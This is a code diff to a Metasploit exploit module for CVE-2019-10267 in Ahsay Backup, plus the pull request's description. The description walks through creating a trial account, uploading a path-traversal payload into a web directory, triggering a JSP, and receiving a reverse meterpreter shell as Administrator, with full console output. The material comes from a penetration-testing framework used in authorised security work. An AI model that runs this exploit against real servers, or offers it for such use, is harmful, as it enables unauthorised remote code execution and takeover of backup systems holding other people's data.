     headers['X-RSW-Request-1'] = password
     headers['X-RSW-custom-encode-path'] = uploadPath
-    payload = "test"
     res = send_request_raw({
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
       'method' => 'PUT',

--- a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
+++ b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2019-10267'],
-          [ 'URL', 'https://www.wbsec.nl/Ahsay_vulnerabilities' ],
+          [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
           [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
         ],
       'Privileged'  => true,
@@ -67,8 +67,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
-        OptString.new('USERNAME', [true, 'Username to Ahsay', 'ahsay01']),
-        OptString.new('PASSWORD', [true, 'Password to Ahsay', 'Ahsay01!']),
+        OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
+        OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12) + Rex::Text.rand_char("","!@#$%^&*()_+/?")]),
         OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
         OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
@@ -76,11 +76,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    trialEnabled = isTrialEnabled?
+    trial_enabled = is_trial_enabled?
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    if trialEnabled and datastore['CREATEACCOUNT'] == "true"
+    if trial_enabled and datastore['CREATEACCOUNT'] == "true"
       if username == "" or password == ""
         print_status("Please set a username and password")
         return Exploit::CheckCode::Unknown
@@ -89,17 +89,17 @@ class MetasploitModule < Msf::Exploit::Remote
         return Exploit::CheckCode::Vulnerable
       end
     elsif username != "" and password != ""
-      if checkAccount?()
+      if check_account?()
         print_status("Username and password are valid")
         return Exploit::CheckCode::Vulnerable
       else
         print_status("Username and password are invalid")
-        if trialEnabled
+        if trial_enabled
           print_status("Server supports trial accounts, you can create an account!")
         end
         return Exploit::CheckCode::Unknown
       end
-    elsif trialEnabled
+    elsif trial_enabled
       print_status("Server supports trial accounts, try creating an account")
       return Exploit::CheckCode::Unknown
     else
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def is_trial_enabled?
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','is_trial_enabled'),
       'method' => 'POST',
       'data'   => ''
     })
@@ -157,12 +157,12 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    if isTrialEnabled?() and datastore['CREATEACCOUNT'] == "true"
+    if is_trial_enabled?() and datastore['CREATEACCOUNT'] == "true"
       if username == "" or password == ""
         fail_with(Failure::NoAccess, 'Please set a username and password')
       else
         #check if account does not exists?
-        if !checkAccount?()
+        if !check_account?()
           # Create account and check if it is valid
           if createAccount?()
             drop_and_execute()
@@ -176,10 +176,10 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
     elsif username != "" and password != ""
-      if checkAccount?()
+      if check_account?()
         drop_and_execute()
       else
-        if isTrialEnabled?()
+        if is_trial_enabled?()
           fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
         end
         fail_with(Failure::NoAccess, 'Username and password are invalid')


### PR DESCRIPTION
This exploit will upload  a file to the server, it is possible to change the path and upload it in a directory that is accessible through the webserver. For this to work a valid user account is necessary, but trial accounts are enabled by default and an account can be created this way. 

Installation if the Ahsay Backup:
- [ ] Install Windows server
- [ ] download the vulnerable version: `http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe`
- [ ] Install cbs-win.exe on Windows server
- [ ] Start the application ( I start it manually from `C:\Program Files\AhsayCBS\bin\startup.bat`)

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/misc/ahsay_fileupload`
- [ ] enable create trial account `set CREATEACCOUNT true`
- [ ] set RHOST `set RHOST 172.16.238.175` 
- [ ] set LHOST `set LHOST 172.16.238.235`
- [ ] run exploit `run`
- [ ] We should receive a meterpreter shell.

## msfconsole output
```
msf > use exploit/windows/misc/ahsay_fileupload
msf exploit(windows/misc/ahsay_fileupload) > show options

Module options (exploit/windows/misc/ahsay_fileupload):

   Name           Current Setting            Required  Description
   ----           ---------------            --------  -----------
   CREATEACCOUNT  false                      no        Create Trial account
   PASSWORD       Ahsay01!                   yes       Password to Ahsay
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                                     yes       The target address
   RPORT          443                        yes       The target port (TCP)
   SSL            true                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                          yes       Path to Ahsay
   UPLOADPATH     ../../webapps/cbs/help/en  no        Payload Path
   USERNAME       ahsay01                    yes       Username to Ahsay
   VHOST                                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(windows/misc/ahsay_fileupload) > set CREATEACCOUNT true
CREATEACCOUNT => true
msf exploit(windows/misc/ahsay_fileupload) > set RHOST 172.16.238.175
RHOST => 172.16.238.175
msf exploit(windows/misc/ahsay_fileupload) > set LHOST 172.16.238.235
LHOST => 172.16.238.235
msf exploit(windows/misc/ahsay_fileupload) > run

[*] Started reverse TCP handler on 172.16.238.235:4444 
[+] Username and password are valid!
[+] No need to create account, already exists!
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/lcofxnrzON.exe
[*] Uploading payload
[+] Succesfully uploaded ../../webapps/cbs/help/en/myjnJMFlNi.jsp
[*] Triggering exploit! https://172.16.238.175:443/cbs/help/en/myjnJMFlNi.jsp
[+] Exploit executed!
[*] Sending stage (179779 bytes) to 172.16.238.175
[*] Meterpreter session 1 opened (172.16.238.235:4444 -> 172.16.238.175:1114) at 2019-07-16 14:59:45 +0200
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/lcofxnrzON.exe' on the target
[!] This exploit may require manual cleanup of '../../webapps/cbs/help/en/myjnJMFlNi.jsp' on the target

meterpreter > getuid
Server username: AHSAY-123\Administrator

```